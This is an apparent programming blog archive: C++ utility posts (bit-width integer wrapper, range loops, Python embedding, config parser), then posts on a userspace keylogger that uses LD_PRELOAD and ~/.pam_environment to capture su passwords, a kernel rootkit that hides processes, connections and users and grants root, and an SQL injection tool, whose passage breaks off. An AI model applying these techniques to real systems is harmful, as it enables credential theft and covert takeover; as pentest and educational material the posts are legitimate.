You can find the MD5 implementation here. Maybe I'll implement SHA1 soon, whenever I have some time.

Well, this was the first time I used constexpr, it was a nice experience. Implementing this using only TMP would be an extreme pain in the ass.

small integer C++ wrapper

2012-08-22T00:01:00.000-03:00

Currently, I'm working on libtins, a library I'm developing with a friend. This library mainly contains classes that abstract PDUs, among other stuff.

Since PDU classes are basically a wrapper over the protocol data units handled by the operating system, getters and setters are provided to enable the user to modify the fields in them. For example, there is a TCP::data_offset method which takes a value of type uint8_t and stores it in the TCP header's data offset field, which is 4 bits wide.

While developing unit tests for this library, I would use some random number to initialize those fields, and then use the corresponding getter to check that the same number came out of it. A problem that I faced several times is that there is no way to indicate that, while a setter method takes a uint8_t, the field being set internally is actually 4 bits wide, so any value larger than 15 would overflow, leading to the wrong number being stored. We really want to be able to detect those ugly errors.

One solution would be to check, on each setter, whether the provided value is larger than 2 ** n - 1, where n is the width of the field being set, and raise an exception if this condition is true. This has the drawback that every setter has to make the appropriate check, using the appropriate power of 2, and throw the same exception. This boilerplate solution already looks nasty.

So I came up with a better solution. C++'s implicit conversions can do magic for us. All we need is a class that wraps a value of an arbitrary bit width (up to 64 bits) and performs the corresponding checks while being initialized.

The wrapper class is called small_uint (I thought about providing support for signed integral types, but finally dropped that option. It'd be easy to implement though). The class declaration is this one:

template<size_t n> class small_uint;

The template non-type parameter n indicates the length, in bits, of the field. This class should be optimal, meaning that it should use the smallest integral type that can hold a value of that width.

Internally, a compile-time switch is performed to check which is the best underlying type, meaning the type in which storing the field wastes the least space. For example, for 7 bit small_uints, a uint8_t is used, while 11 bit fields will be stored in a member variable of type uint16_t. This underlying type is typedef'ed as the repr_type.

There is a constructor which takes a repr_type and raises an exception if it is larger than 2 ** n - 1, and a user-defined conversion to repr_type which simply returns the stored value. Since no arithmetic operations are performed with these integers, there are no such operators defined. I don't really know if defining them would make sense. If you wanted to perform such operations, you would just use standard arithmetic types. Only operator== and operator!= have been defined.
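
A minimal sketch of that design follows. It is not the real small_uint implementation: it uses C++11's std::conditional for the type selection instead of C++03 techniques, it leaves out operator== and operator!= (comparisons go through the conversion to repr_type instead), and toy_tcp_header is a made-up struct used only to show a setter.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <type_traits>

// Sketch only: relies on C++11, unlike the C++03 implementation in the post.
template <std::size_t n>
class small_uint {
    static_assert(n >= 1 && n <= 64, "width must be between 1 and 64 bits");

public:
    // Smallest unsigned type able to hold n bits.
    typedef typename std::conditional<
        n <= 8, std::uint8_t,
        typename std::conditional<
            n <= 16, std::uint16_t,
            typename std::conditional<n <= 32, std::uint32_t,
                                      std::uint64_t>::type>::type>::type
        repr_type;

    // Largest value that fits in n bits, that is, 2 ** n - 1.
    static constexpr std::uint64_t max_value =
        n == 64 ? ~std::uint64_t(0) : (std::uint64_t(1) << (n % 64)) - 1;

    // Deliberately not explicit, so setters can be called with plain integers.
    small_uint(repr_type value) : value_(value) {
        if (value > max_value)
            throw std::out_of_range("value does not fit in the field");
    }

    operator repr_type() const { return value_; }

private:
    repr_type value_;
};

// Hypothetical header with a 4-bit field and a checked setter.
struct toy_tcp_header {
    unsigned data_offset : 4;

    void set_data_offset(small_uint<4> value) { data_offset = value; }
};
```

Calling set_data_offset(5) stores 5, while set_data_offset(16) throws before anything is written. One caveat of taking a repr_type: a value such as 256 is truncated to the uint8_t value 0 before the check runs, so only overflows within the underlying type's range are detected.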

I haven't used this class in libtins yet, but setters would probably look like this:

void TCP::data_offset(small_uint<4> value) {
     tcp_header_.data_offset = value;
}

That way, a nice and clean solution can be achieved, avoiding boilerplate code. Note that internally, C++11 features could make a lot of things easier (such as std::numeric_limits<>::max() being constexpr, std::conditional, and constexpr functions), but I wanted to use only C++03 stuff, since the library is intended to work with the latter standard.

The small_uint implementation can be found here.

Python style range loops in C++

2012-07-02T18:52:00.000-03:00

Python is a nice scripting language which has some really flexible characteristics. One thing I like about it is the integer range for-loops that can be achieved using the built-in function range:

for i in range(10):
    # Insert clever statement below 
    print(i)

Doing that same thing in C++ would require some for loop like the one below:

for(size_t i(0); i < 10; ++i)
    std::cout << i << std::endl;

Which is longer and less clear (well, not that much :D). So I created a simple wrapper to achieve the same thing in C++, using C++11's range-based for loops. The wrapper can be found here.

In order to use ranges, a function named range should be used, which contains these overloads:

// Returns a range_wrapper<T> containing the range [start, end)
template<class T>
range_wrapper<T> range(const T &start, const T &end) {
    return {start, end};
}

// Returns a range_wrapper<T> containing the range [T(), end)
template<class T>
range_wrapper<T> range(const T &end) {
    return {T(), end};
}

range_wrapper<> is a simple wrapper that defines begin() and end(). Both return a range_iterator, the former pointing to the beginning of the range and the latter to the end. The range_iterator<> class template is just a wrapper over the template parameter, and defines all of the member functions and typedefs required of a forward iterator. The prefix/suffix increment operators apply the same operator on the wrapped object, while the dereference operator returns it.

Since range-based for loops require the iterated sequence to define begin() and end() or that the global std::begin()/end() functions are defined for the given type, using the range_wrapper<> class template in these for loops is perfectly valid.
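
The description above can be sketched roughly as follows. This is my own minimal reconstruction from that description, not necessarily identical to the linked wrapper; only the names range, range_wrapper and range_iterator come from the post.

```cpp
#include <cstddef>
#include <iterator>

// Forward iterator that simply wraps a value of type T.
template<class T>
class range_iterator {
public:
    typedef std::forward_iterator_tag iterator_category;
    typedef T value_type;
    typedef std::ptrdiff_t difference_type;
    typedef const T *pointer;
    typedef const T &reference;

    explicit range_iterator(const T &value) : value_(value) {}

    // Dereferencing returns the wrapped object.
    reference operator*() const { return value_; }
    pointer operator->() const { return &value_; }

    // Incrementing forwards to the wrapped object's own operator++.
    range_iterator &operator++() { ++value_; return *this; }
    range_iterator operator++(int) {
        range_iterator copy(*this);
        ++value_;
        return copy;
    }

    bool operator==(const range_iterator &rhs) const { return value_ == rhs.value_; }
    bool operator!=(const range_iterator &rhs) const { return !(*this == rhs); }

private:
    T value_;
};

// Holds the half-open range [start, end) and exposes begin()/end().
template<class T>
class range_wrapper {
public:
    range_wrapper(const T &start, const T &end) : start_(start), end_(end) {}

    range_iterator<T> begin() const { return range_iterator<T>(start_); }
    range_iterator<T> end() const { return range_iterator<T>(end_); }

private:
    T start_, end_;
};

template<class T>
range_wrapper<T> range(const T &start, const T &end) {
    return {start, end};
}

template<class T>
range_wrapper<T> range(const T &end) {
    return {T(), end};
}
```

Note that the loop stops when the iterators compare equal, so a range whose start is greater than its end would never terminate in this sketch.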

Using this wrapper, that code can be reduced to this:

// Prints numbers in range [0, 10) 
for(auto item : range(10))
    std::cout << item << std::endl;

Using the first overload, which takes the start and end of the range, we can indicate the starting number.

// Prints numbers in range [5, 15) 
for(auto item : range(5, 15))
    std::cout << item << std::endl;

Note that range is a template function, so it could be adapted to perform range iteration through other types(std::string comes to my mind right now).

This same thing can be achieved using boost::irange, but hey, I was bored and wanted to implement it myself.

Python wrapper in C++11

2012-04-06T01:51:00.000-03:00

This is a post about a wrapper for Python scripts I developed using C++11. This was the first time I used variadic templates, and I must say it's an amazing feature in this new C++ standard! It's great to have a type-safe way to use variable arguments.

The whole wrapper is inside the Python namespace. Before you start using anything inside it, you should call Python::initialize(), which initializes the Python API.

The Python::Object class provides an abstraction of a python object. Python::Objects wrap a PyObject*(which is the abstraction of a Python object provided by its API), inside a std::shared_ptr. On their destructor, a call to Py_DECREF is performed, so the underlying PyObject* will get free'd appropriately.
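
The ownership idea can be shown without the Python API at all. In the sketch below, FakeObject and fake_decref are hypothetical stand-ins for PyObject and Py_DECREF, and Handle is a made-up name playing the role of Python::Object; the point is only the std::shared_ptr with a custom deleter.

```cpp
#include <memory>

// Stand-in for PyObject: a manually reference-counted object (hypothetical).
struct FakeObject {
    int refcount;
};

// Stand-in for Py_DECREF: drops one reference, frees the object at zero.
inline void fake_decref(FakeObject *obj) {
    if (--obj->refcount == 0)
        delete obj;
}

// Owns exactly one reference to the wrapped object, no matter how many
// times the handle itself is copied.
class Handle {
public:
    explicit Handle(FakeObject *obj) : ptr_(obj, fake_decref) {}

    FakeObject *get() const { return ptr_.get(); }

private:
    // The deleter runs once, when the last copy of the handle is destroyed.
    std::shared_ptr<FakeObject> ptr_;
};
```

Copies of a Handle share the same control block, so the wrapped reference is released a single time.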

In order to load a python script, a static method Python::Object::from_script(const std::string &) should be called, which returns a Python::Object that represents that script. The name of the script(with or without the ".py" extension) should be passed as argument:

#include "pywrapper.h"

/* ... */

Python::Object script = Python::Object::from_script("test.py"); //could be test also

After that statement, the "script" variable will have loaded the "test.py" script, located in the current working directory.

Now you can call functions defined in that script using the Python::Object::call_function method, which has these signatures:

// Variadic template arguments version
template<typename... Args>
Python::Object call_function(const std::string &name, const Args&... args);
 
// No arguments version
Python::Object call_function(const std::string &name);

This method takes the name of the function as the first argument, followed by 0 or more arguments. These arguments will be implicitly converted to PyObject pointers, which can be used as arguments using the Python API. So far, you can use arguments of these types:

std::string
const char *
Any integral type(for which std::is_integral is true).
bool
double
std::vector
std::list
std::map

Both std::vector and std::list will be converted to a Python list, with the exception of std::vector<char>, which will be converted to a bytearray. The std::map objects will be converted to Python dicts.
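
To illustrate how a parameter pack can drive one conversion per argument, here is a small sketch that needs no Python headers. Instead of producing PyObject pointers, the hypothetical to_repr overloads produce text; describe_call, to_repr and join are names I made up, and the real wrapper may dispatch differently.

```cpp
#include <cstddef>
#include <string>
#include <type_traits>
#include <vector>

// Joins already converted items as "a, b, c".
inline std::string join(const std::vector<std::string> &items) {
    std::string result;
    for (std::size_t i = 0; i < items.size(); ++i) {
        if (i != 0)
            result += ", ";
        result += items[i];
    }
    return result;
}

// One overload per supported type; an unsupported type fails to compile.
inline std::string to_repr(const std::string &value) { return "'" + value + "'"; }
inline std::string to_repr(const char *value) { return to_repr(std::string(value)); }
inline std::string to_repr(bool value) { return value ? "True" : "False"; }

// Any integral type except bool, which has its own overload above.
template<class T>
typename std::enable_if<std::is_integral<T>::value &&
                        !std::is_same<T, bool>::value, std::string>::type
to_repr(T value) {
    return std::to_string(value);
}

// Containers convert each element with the overloads above.
template<class T>
std::string to_repr(const std::vector<T> &values) {
    std::vector<std::string> items;
    for (const T &value : values)
        items.push_back(to_repr(value));
    return "[" + join(items) + "]";
}

// The pack expansion calls to_repr once per argument, in order.
template<class... Args>
std::string describe_call(const std::string &name, const Args&... args) {
    std::vector<std::string> converted{to_repr(args)...};
    return name + "(" + join(converted) + ")";
}
```

Because overload resolution happens at compile time, passing a type with no matching to_repr overload is rejected by the compiler instead of failing at runtime, which is the type safety that C-style variable arguments lack.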

The Python::Object::call_function method returns the Python return value wrapped in a Python::Object. Note that the objects stored in the std::vectors and std::lists must also be convertible to PyObject pointers (that is, they must be of one of the types listed above).

In case you want to use the return value, you might want to use Python::Object::convert which will convert the wrapped PyObject* into one of the same C++ types mentioned above, and also std::tuple.

As an example, I used this Python script:

#!/usr/bin/python

def foo(a, b, c, d, e):
    print '{0} - {1} - {2} - {3} - {4}'.format(
        a, str(b), str(c), repr(d), repr(e)
    )

def int_fun():
    return 12

def list_fun():
    return [1,2,3,4,561,2]
    
def dict_fun():
    return {
        'bar' : 1,
        'foo' : 15
    }

def tuple_fun():
    return (1, 'foo', 15.5)

def bool_fun():
    return False

x = 1598

It's just a bunch of functions that take/return different types of arguments. My C++ code that calls these functions is this one:

#include <string>
#include <vector>
#include <iostream>
#include <stdexcept>
#include <iomanip>
#include <map>
#include <tuple>
#include "pywrapper.h"

int main() {
    Python::initialize();
    Python::Object script(Python::Object::from_script("test_script.py"));
    std::vector<int> v({2,6,5});
    std::map<std::string, int> dict({
        {"bleh", 1},
        {"foofoo", 10}
    });
    std::cout << "Calling foo:\n";
    script.call_function("foo", "a string", true, 10, v, dict);
    
    // Int test
    std::cout << "Calling int_fun:\n";
    Python::Object ptr = script.call_function("int_fun");
    int num;
    if(ptr.convert(num))
        std::cout << "Result: " << num << '\n';
    else
        std::cout << "Long conversion failed\n";
    
    // List test
    std::vector<int> lst;
    std::cout << "Calling list_fun:\n";
    ptr = script.call_function("list_fun");
    if(ptr.convert(lst)) {
        std::cout << "List size: " << lst.size() << '\n';
        for(auto it(lst.begin()); it != lst.end(); ++it)
            std::cout << *it << " ";
        std::cout << '\n';
    }
    else
        std::cout << "List conversion failed\n";
    
    // Dict test
    std::map<std::string, int> mp;
    std::cout << "Calling dict_fun:\n";
    ptr = script.call_function("dict_fun");
    if(ptr.convert(mp)) {
        std::cout << "Map size: " << mp.size() << '\n';
        for(auto it(mp.begin()); it != mp.end(); ++it)
            std::cout << it->first << " -> " << it->second << '\n';
    }
    else
        std::cout << "Map conversion failed\n";
        
    // Tuple test
    std::cout << "Calling tuple_fun:\n";
    ptr = script.call_function("tuple_fun");
    std::tuple<int, std::string, double> tup;
    if(ptr.convert(tup)) {
        std::cout << std::get<0>(tup) << "\n";
        std::cout << std::get<1>(tup) << "\n";
        std::cout << std::get<2>(tup) << "\n";
    }
    else
        std::cout << "Tuple conversion failed\n";
    
    bool bool_val;
    std::cout << "Calling bool_fun:\n";
    ptr = script.call_function("bool_fun");
    if(ptr.convert(bool_val))
        std::cout << "Result: " << std::boolalpha << bool_val << '\n';
    else
        std::cout << "Bool conversion failed\n";
    
    // Get attr test
    std::cout << "Retrieving 'x' variable:\n";
    try {
        ptr = script.get_attr("x");
        if(ptr.convert(num))
            std::cout << "X == " << num << '\n';
    } catch(std::runtime_error &ex) {
        std::cout << ex.what() << '\n';
    }
    
}

In the last statements of the code, the Python::Object::get_attr method is used, which returns a Python::Object containing the script attribute whose name is given as the argument. After executing this application, this output is produced:

Calling foo:
a string - True - 10 - [2, 6, 5] - {'bleh': 1, 'foofoo': 10}
Calling int_fun:
Result: 12
Calling list_fun:
List size: 6
1 2 3 4 561 2
Calling dict_fun:
Map size: 2
bar -> 1
foo -> 15
Calling tuple_fun:
1
foo
15.5
Calling bool_fun:
Result: false
Retrieving 'x' variable:
X == 1598

As you can see, this class allows a type-safe variable argument interface for calling Python functions and retrieving defined attributes in scripts.

You can get the header and source file here.

In order to compile this application, using gcc, remember to use the -std=c++0x and -lpython2.7 arguments.

I hope you find this wrapper useful!

Configuration file parser - C++

2012-03-03T11:20:00.000-03:00

I'm working on a project developed in C++, which can be configured using several parameters at runtime. Since there were lots of options, I decided to include a configuration file in which the user could assign a value to each defined attribute. This is an example of the file's structure:

 


# Default yasps configuration
# By default the server is bound to 0.0.0.0:7517
# --------------------------------------------------
# Server configuration
bind_address=0.0.0.0
port=7517

# Authentication configuration
# Unauthenticated connections are allowed by default
noauth=1
username=user
password=pass123

As you can see, the options require different data types. Therefore, I needed a generic algorithm that could parse the file and interpret the given values as strings, integers, bools or whatever data type I indicated, and assign them to the corresponding attribute. To achieve this, I created a small class using template parameters.

The ConfigurationParser is extremely simple to use. There is one method which adds an attribute and associates it with a pointer. Whenever that attribute name is found on the file, the parser will try to interpret the given value and store it in that pointer. The method has the following signature:

template<class T>
void add_option(const std::string &name, T *value_ptr);

The only constraint imposed on the type T is that the input operator(operator>>) is defined. As long as you use either primitive types or std::string(s), you don't have to implement anything else. In case you have created a certain class that can be deserialized, you would have to implement this operator.

Once every attribute has been set, you have to call the ConfigurationParser::parse method, using the configuration file name as the argument. This is the signature of this method:

void parse(const std::string &file_name);

This method can raise different exceptions, depending on what problem was encountered:

std::ios_base::failure if an error occurred when opening the file.
ConfigurationParser::NoValueGivenError if no value was set for an attribute that appeared in the configuration file, e.g. bleh= (there should be some value after the '=' character).
ConfigurationParser::InvalidValueError if there was a data type mismatch when trying to interpret an attribute's value. This can happen if, for example, an attribute expects an integer value but a string value is given.
ConfigurationParser::InvalidOptionError is raised if an attribute which was not registered using ConfigurationParser::add_option appeared in the configuration file.
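
The mechanism described above (one pointer per option, values read through operator>>) can be sketched in a few lines. This is not the actual ConfigurationParser source: MiniConfigParser is a hypothetical name, it reads from a std::istream instead of a file name, and it throws plain std::runtime_error instead of the dedicated exception classes.

```cpp
#include <functional>
#include <istream>
#include <map>
#include <sstream>
#include <stdexcept>
#include <string>

class MiniConfigParser {
public:
    // Registers an option; T only needs to support operator>>.
    template<class T>
    void add_option(const std::string &name, T *value_ptr) {
        setters_[name] = [value_ptr](const std::string &text) -> bool {
            std::istringstream input(text);
            T parsed;
            if (!(input >> parsed))
                return false;       // type mismatch, target left untouched
            *value_ptr = parsed;
            return true;
        };
    }

    // Parses "name=value" lines, skipping blank lines and '#' comments.
    void parse(std::istream &input) {
        std::string line;
        while (std::getline(input, line)) {
            if (line.empty() || line[0] == '#')
                continue;
            const std::string::size_type eq = line.find('=');
            if (eq == std::string::npos)
                throw std::runtime_error("missing '=' in: " + line);
            const std::string name = line.substr(0, eq);
            const std::string value = line.substr(eq + 1);
            const auto it = setters_.find(name);
            if (it == setters_.end())
                throw std::runtime_error("unknown option: " + name);
            if (value.empty())
                throw std::runtime_error("no value given for: " + name);
            if (!it->second(value))
                throw std::runtime_error("invalid value for: " + name);
        }
    }

private:
    // Type-erased setters: each one remembers the pointer and its type.
    std::map<std::string, std::function<bool(const std::string &)>> setters_;
};
```

The std::function map is what lets a single container hold setters for strings, shorts and bools at once; each lambda captures the typed pointer it was registered with.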

Note that the ConfigurationParser class is included inside the CPPUtils namespace. Finally, here is an example, taken from the project I'm working on:


#include <iostream>
#include <string>
#include "configparser.h" 

using CPPUtils::ConfigurationParser;

class Configuration {
public:
    void load(const std::string &file_name) {
        ConfigurationParser parser;
        parser.add_option("username", &config_username);
        parser.add_option("password", &config_password);
        parser.add_option("bind_address", &address);
        parser.add_option("log_file", &log_filename);
        parser.add_option("port", &port);
        parser.add_option("noauth", &config_allow_no_auth);
        parser.add_option("enable_logging", &config_enable_logging);
        try {
            parser.parse(file_name);
        }
        catch(std::ios_base::failure &ex) {
            std::cerr << "[ERROR] Error opening " << file_name << "(" << ex.what() << ").\n";
        }
        catch(ConfigurationParser::NoValueGivenError &ex) {
            std::cerr << "[ERROR] Parse error: No value given for " << ex.what() << " attribute.\n";
        }
        catch(ConfigurationParser::InvalidValueError &ex) {
            std::cerr << "[ERROR] Parse error: Invalid value for attribute " << ex.what() << "\n";
        }
        catch(ConfigurationParser::InvalidOptionError &ex) {
            std::cerr << "[ERROR] Parse error: Could not find a valid attribute in \"" << ex.what() << "\"\n";
        }
    }
private:
    std::string config_username, config_password, address, log_filename;
    short port;
    bool config_allow_no_auth, config_enable_logging;
};

That's all. You can download the header file here, the source file here and the only header dependency, exception.h. The class is licensed under GPLv3, so feel free to use it.

Linux terminal keylogger in userspace

2012-02-09T00:24:00.001-03:00

Introduction

Sometimes, during a pentest, you have a certain system user's password and can successfully log in to the system (using ssh, for example), but cannot gain root privileges. This happens when the user is not a sudoer (or sudo is not even installed on the system) and, of course, the password is not the same as the root user's.

However, this user might actually use "su" to become the superuser. In this case, we have access to his settings and configuration files, located in his home directory, which can be modified and used to obtain the root's password.

There are several environment variables that libc uses to modify an application's behaviour when launching it. Among many, there is one that allows the user to load one or more arbitrary shared objects right before launching a certain application. This environment variable is named LD_PRELOAD.

The LD_PRELOAD environment variable

Using LD_PRELOAD, a user can launch an application and force it to load any shared object he wants. So how can we take advantage of LD_PRELOAD? On GNU/Linux, programs are usually linked dynamically, allowing the symbols they use to be loaded when the application is launched. When the application is executed, the shared objects that contain the symbols used are loaded, and those symbols' addresses are resolved. Every reference to the loaded symbols will use those addresses.

Fortunately for us, this symbol loading is done after the shared objects pointed by LD_PRELOAD are loaded. Therefore, if we compile a shared object which contains a function that has the same signature(name + return type + arguments) as one that another application expects to resolve, it will use ours instead of the "original" one, allowing us to execute arbitrary code.

Okay, so now we can inject arbitrary code, now how can we use this technique? We could hook the read system call, then wait for the user to launch su. Our object would be loaded and we would be able to read the data typed by the user, in which we will eventually find the root's password.

However, we cannot do this, since su is a suid file. The libc does not allow us to execute an application that has the suid bit set, and instruct it to load our library on startup. If this was possible, we could execute ping, for example, make our shared object load and drop a root shell right away. Therefore LD_PRELOAD + suid binary is not a possibility.

Anyhow, we can use another approach. We can hook the execve syscall, which is used by bash to execute commands, and modify its behaviour. This way we could execute whatever we want, no matter what bash is trying to execute.

The actual keylogger

So instead of hooking the read syscall and logging every byte read by the application, I hooked execve: the hook calls fork() right before calling the original execve, and logs the data that is written to stdin (which should be read by the execve'd application) into a file. This way, no matter what is being executed, suid binaries or regular ones, we can still read stdin, since we are not hooking the syscall in the executed application, but in bash. My execve is basically a proxy that logs everything that is written to stdin before it is sent to the child process.

Finally, we can read every byte written by the user, but we require bash to load our shared object using the LD_PRELOAD environment variable. We can achieve this by editing(or creating) the ~/.pam_environment file and inserting this line into it:

LD_PRELOAD=FullPathToTheSharedObject

In my case, I inserted the line:

LD_PRELOAD=/home/matias/key.so

After a restart (or a logout performed by the user) that environment variable will be set, loading our shared object every time bash starts.

Note that we can't edit the .bashrc file, since this file is interpreted by bash after the process is created. What we require is a way of editing the LD_PRELOAD environment variable before bash is started, which can be achieved through ~/.pam_environment.

The source code of this PoC is available at https://github.com/mfontanini/Programs-Scripts/tree/master/keylogger. Download both keylogger.c and Makefile. In order to compile, just execute make; keylogger.so will be the generated object.

This is a screenshot of the keylogger, storing the password and commands typed by the user when executing su:

By default the log file is located in /tmp/output. If you want to change it, just edit the OUTPUT_FILE define in the source code, or add a flag to CFLAGS in the Makefile:

CFLAGS=-c -Wall -O3 -fPIC -DOUTPUT_FILE=/home/somebody/blah.log

There is an array named injected_files which contains a list of all the files that will be "logged" when executed. This is used because there are lots of applications that we don't want to log. This array contains /bin/su and /usr/bin/ssh. Feel free to add any other application that you want to keylog.

Finally, there's a code snippet at the end of the file which removes the value of the LD_PRELOAD variable right after the shared object is loaded. This is just a mechanism to hide our keylogger. Otherwise, if the user executed "echo $LD_PRELOAD" while using bash, he would see the location of our keylogger as the output. Note that by removing the LD_PRELOAD variable, child processes will not load our shared object, therefore in a GUI environment, where the first application that is executed is gnome-terminal or other graphical terminal, and this application is the one that executes bash, the shared object will be loaded by gnome-terminal, but won't be loaded by bash. Therefore, if you plan on using this keylogger on a GUI environment, remove the body of the "void init(void)" function, located at the end of keylogger.c.
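
The hiding step on its own is tiny. Below is a minimal sketch of the idea, assuming GCC or Clang (the constructor attribute is a compiler extension); hide_preload is a hypothetical helper name, and the real init function in keylogger.c may differ.

```cpp
#include <cstdlib>   // std::getenv
#include <stdlib.h>  // unsetenv (POSIX)

// Removes LD_PRELOAD from the environment of the current process.
// Returns true if the variable was set before the call.
inline bool hide_preload() {
    const bool was_set = std::getenv("LD_PRELOAD") != nullptr;
    unsetenv("LD_PRELOAD");
    return was_set;
}

// Functions marked as constructors run when the object is loaded, before
// main() of the host program starts.
__attribute__((constructor))
static void init() {
    hide_preload();
}
```

The object is already mapped into the process by the time the constructor runs, so clearing the variable does not unload it; it only affects what the process and its children see in their environment, which is exactly why child processes stop loading it.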

Hope you find it useful!

Linux rootkit implementation

2011-12-04T16:49:00.001-03:00

This is a rootkit I developed some time ago for educational purposes. It can hide itself from lsmod, hide processes, TCP connections and logged-in users, and give uid 0 to any running process. The rootkit now works on Linux kernels >= 3.0 thanks to Dhiru Kholia, who ported it. He also made the fixes required for the rootkit to compile on CentOS. The rootkit has been successfully tested on kernels >= 2.6.26.

The hiding is performed through file system function hooking. On Linux, every fs driver provides functions to open, read, write and perform other operations on files and directories. These functions are stored in a struct file_operations, which is referenced by every inode. Therefore, every file_operations contains a pointer to the open, read, write (and many other) functions which will be called whenever a user tries to execute those actions on a filesystem object.

So what I did was retrieve a certain inode and modify the pointer to its read function, replacing it with my own function. This new function filters the data being read, removing the entries I wanted to hide.

Let's take, for example, the connection hiding mechanism. netstat takes its TCP connection information from a virtual file named /proc/net/tcp. This file contains one entry per line, each one indicating the source and destination ports, the source and destination addresses and more information about each open connection. In order to hide a certain connection, I replaced the default read function with my own, in which I read the entries in that file and skipped those containing the port I needed to hide.
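
The filtering itself is easier to follow outside the kernel. The sketch below is a userspace illustration only, not the rootkit's code: it takes the text of /proc/net/tcp and drops the entries whose source port matches. The function names are made up, and it relies on the second field of each entry being the local address written as HEXIP:HEXPORT.

```cpp
#include <cstdlib>
#include <sstream>
#include <string>

// Returns the local (source) port of one /proc/net/tcp entry, or -1 if the
// line is not a connection entry (for example, the header line).
inline long local_port(const std::string &line) {
    std::istringstream fields(line);
    std::string slot, local;
    if (!(fields >> slot >> local))
        return -1;
    const std::string::size_type colon = local.find(':');
    if (colon == std::string::npos)
        return -1;
    // The port is the hexadecimal number after the colon.
    return std::strtol(local.c_str() + colon + 1, nullptr, 16);
}

// Copies `contents` line by line, skipping entries bound to `hidden_port`.
inline std::string hide_source_port(const std::string &contents, long hidden_port) {
    std::istringstream input(contents);
    std::string line, output;
    while (std::getline(input, line)) {
        if (local_port(line) == hidden_port)
            continue;
        output += line + '\n';
    }
    return output;
}
```

A hooked read function has to do the same job on the buffer it hands back to the caller, and additionally report the shortened length.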

In order to give orders to the rootkit, I used the same mechanism. I added a write function pointer to the file /proc/buddyinfo, which by default has no write permissions. So after hooking that function, whenever any user writes something to that virtual file, the rootkit will read what was written and execute actions based on the input. It supports the following commands:

hide/show. These commands hide/show the rootkit from lsmod (actually from /proc/modules).
hsport PORT/ssport PORT. Hides(hsport) connection which have PORT as their source port, or "unhides it"(ssport) if it was previously hidden.
hdport PORT/sdport PORT. Same as above but using destination port instead of source.
hpid PID/spid PID. Hides or "unhides" a process that has PID as its pid. This is done by hooking the /proc readdir pointer.
huser USER/suser USER. These commands hide or "unhide" a logged in user, so that who or other similar commands won't indicate USER is logged in to the system. This is done by hooking /var/run/utmp.
root PID. This makes the process identified by PID to contain uid 0 and gid 0. This is kind of dirty but works well; the credentials struct from the init process is copied to the process identified by PID.
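
As a userspace illustration of the command format listed above, this sketch splits a written line into a command name and its optional argument. It is not taken from the rootkit source; Command and parse_command are hypothetical names, and the argument is kept as text without validating that a PORT or PID is numeric.

```cpp
#include <set>
#include <sstream>
#include <string>

struct Command {
    std::string name;      // e.g. "hsport"
    std::string argument;  // e.g. "22"; empty for hide/show
};

// Parses one line written to the control file. Returns false for unknown
// commands or a wrong number of arguments, leaving `out` untouched.
inline bool parse_command(const std::string &input, Command &out) {
    static const std::set<std::string> no_argument = {"hide", "show"};
    static const std::set<std::string> one_argument = {
        "hsport", "ssport", "hdport", "sdport",
        "hpid", "spid", "huser", "suser", "root"
    };

    std::istringstream words(input);
    Command parsed;
    std::string extra;
    if (!(words >> parsed.name))
        return false;
    const bool has_argument = static_cast<bool>(words >> parsed.argument);
    if (words >> extra)
        return false;  // more words than any command accepts

    const bool valid = has_argument ? one_argument.count(parsed.name) != 0
                                    : no_argument.count(parsed.name) != 0;
    if (!valid)
        return false;
    out = parsed;
    return true;
}
```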

This is a screenshot showing how the rootkit works, hiding a user, a process, the ssh socket and making the bash process gain root privileges:

You can get the source code at https://github.com/mfontanini/Programs-Scripts/tree/master/rootkit. In order to compile it, you require your kernel's headers (on Debian-based distributions, these can be found in the package linux-headers-2.6.X.X, where X depends on your kernel version). Download both the Makefile and the source file, and then just execute:

make
insmod rootkit.ko

That's all. Hope you find it useful!

The Mole - SQL Injection exploitation tool

2011-10-11T17:58:00.001-03:00

The Mole is a command line interface SQL Injection exploitation tool.
This application, developed in python, is able to exploit both union-based and blind boolean-based injections.

Every action The Mole can execute is triggered by a specific command. All this application requires in order to exploit a SQL Injection is the URL(including the parameters) and a needle(a string) that appears in the server's response whenever the injection parameter generates a valid query, and does not appear otherwise. Note that the vulnerable parameter must be the last one on the URL.
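
To make the role of the needle concrete, here is a generic sketch of how a yes/no answer per request is enough to recover data in blind boolean mode. It does not reproduce The Mole's code or its query strategy: the Oracle type is a stand-in for "send a request and check whether the needle appears in the response", and all names here are hypothetical.

```cpp
#include <cstddef>
#include <functional>
#include <string>

// Answers "is the character at `index` greater than `threshold`?".
// In a real session, true would mean the needle was found in the response.
typedef std::function<bool(std::size_t index, int threshold)> Oracle;

// Binary search over the ASCII range [0, 127] using only yes/no answers.
inline char recover_char(const Oracle &greater_than, std::size_t index) {
    int low = 0, high = 127;  // invariant: low <= value <= high
    while (low < high) {
        const int mid = low + (high - low) / 2;
        if (greater_than(index, mid))
            low = mid + 1;
        else
            high = mid;
    }
    return static_cast<char>(low);
}

// Recovers `length` characters, one binary search per position.
inline std::string recover_string(const Oracle &greater_than, std::size_t length) {
    std::string result;
    for (std::size_t i = 0; i < length; ++i)
        result += recover_char(greater_than, i);
    return result;
}
```

With a 128-value range, each character costs seven oracle calls, which is why blind mode is noticeably slower than union mode and why issuing requests from several threads helps.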

So far, The Mole supports Mysql, Mssql and Postgres, but we expect to include other DBMSs.

Edit: to read an updated and more detailed tutorial, please visit: http://themole.nasel.com.ar/?q=tutorial.

Executing The Mole

In order to execute The Mole, you require only python3 and python3-lxml. Once you execute it, a shell prompt will be printed, waiting for commands. You can additionally use some program arguments:

-u URL: Use this to set the URL which contains the vulnerability. This is the same as using the "url" command.

-n NEEDLE: Use this to set the needle to be found in the requested page. This is the same as using the "needle" command.

-t THREADS: Use THREADS threads while performing queries.

Commands

This is a list of all supported commands:

- url [URL]: Gets/sets the URL. This can also be provided as an argument to the application, using the "-u" parameter.

- needle [NEEDLE]: Gets/sets the NEEDLE. This can also be provided as an argument to the application, using the "-n" parameter.

- dbinfo: Fetch current user name, database name and DBMS version.

- schemas: Fetches the schemas (databases) from the server. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.

- tables <SCHEMA>: Fetches the tables for the schema SCHEMA. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.
e.g: "tables mysql"

- columns <SCHEMA> <TABLE>: Fetches the columns for the table TABLE, in the schema SCHEMA. The results obtained will be cached, so further calls to this command will return the cached entries. See "fetch" command.
e.g: "columns mysql user"

- query <SCHEMA> <TABLE> COLUMN1[,COLUMN2[,COLUMN3[...]]] [where COND]:
